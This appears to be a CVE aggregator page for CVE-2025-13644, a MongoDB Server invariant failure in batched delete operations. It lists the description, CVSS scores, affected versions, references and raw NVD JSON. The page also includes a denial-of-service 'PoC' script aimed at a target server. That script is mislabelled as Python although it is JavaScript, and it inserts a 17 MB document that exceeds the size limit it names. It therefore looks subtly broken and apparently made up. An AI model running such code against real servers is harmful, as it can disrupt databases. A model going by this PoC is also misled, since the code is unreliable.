CVE-2025-13644

Description

MongoDB Server may experience an invariant failure during batched delete operations when handling documents. The issue arises when the server mistakenly assumes the presence of multiple documents in a batch based solely on document size exceeding BSONObjMaxSize. This issue affects MongoDB Server v7.0 versions prior to 7.0.26, MongoDB Server v8.0 versions prior to 8.0.13, and MongoDB Server v8.1 versions prior to 8.1.2

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mongodb:mongodb:8.2.0:alpha:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mongodb:mongodb:8.2.0:alpha0:*:*:-:*:*:* - VULNERABLE

MongoDB Server v7.0 < 7.0.26

MongoDB Server v8.0 < 8.0.13

MongoDB Server v8.1 < 8.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-13644 PoC - MongoDB Batched Delete Invariant Failure
// Target: MongoDB Server < 7.0.26, < 8.0.13, < 8.1.2

const { MongoClient } = require('mongodb');

async function triggerVulnerability() {
  const uri = 'mongodb://target:27017';
  const client = new MongoClient(uri);
  
  try {
    await client.connect();
    const db = client.db('test');
    const collection = db.collection('target_collection');
    
    // Create a document exceeding BSONObjMaxSize (16MB)
    const largeData = 'A'.repeat(17 * 1024 * 1024); // ~17MB
    await collection.insertOne({ _id: 'large_doc', data: largeData });
    
    // Attempt batched delete operation to trigger invariant failure
    // This will cause the server to assume multiple docs based on size
    await collection.deleteMany({ _id: 'large_doc' });
    
    console.log('PoC executed');
  } catch (error) {
    console.log('Vulnerability triggered or error:', error.message);
  } finally {
    await client.close();
  }
}

triggerVulnerability();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13644
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13644
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13644/
[4] VulDB https://vuldb.com/cve/CVE-2025-13644
[5] https://jira.mongodb.org/browse/SERVER-101180

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13644", "sourceIdentifier": "[email protected]", "published": "2025-11-25T06:15:45.753", "lastModified": "2025-12-11T23:19:48.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MongoDB Server may experience an invariant failure during batched delete operations when handling documents. The issue arises when the server mistakenly assumes the presence of multiple documents in a batch based solely on document size exceeding BSONObjMaxSize. This issue affects MongoDB Server v7.0 versions prior to 7.0.26, MongoDB Server v8.0 versions prior to 8.0.13, and MongoDB Server v8.1 versions prior to 8.1.2"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.26", "matchCriteriaId": "8788DEE3-96FD-4F62-BE22-EB3F9C4DD73F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.13", "matchCriteriaId": "4BEA7813-D8C9-4377-8760-597C4FD6EDF5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.1.0", "versionEndExcluding": "8.1.2", "matchCriteriaId": "DC3673C5-AE4F-4E95-BF80-7CC6369BE6C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha:*:*:-:*:*:*", "matchCriteriaId": "5BF4D317-BC85-4BA9-9D64-91F14C4398F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha0:*:*:-:*:*:*", "matchCriteriaId": "64806572-E654-4691-90A6-C978BAD30263"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha1:*:*:-:*:*:*", "matchCriteriaId": "870C35A8-B7C5-4CC0-A8D6-D39DE370EEA9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha2:*:*:-:*:*:*", "matchCriteriaId": "FCFCFC59-331F-47E1-9EA4-A0CA3D9F7989"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-101180", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}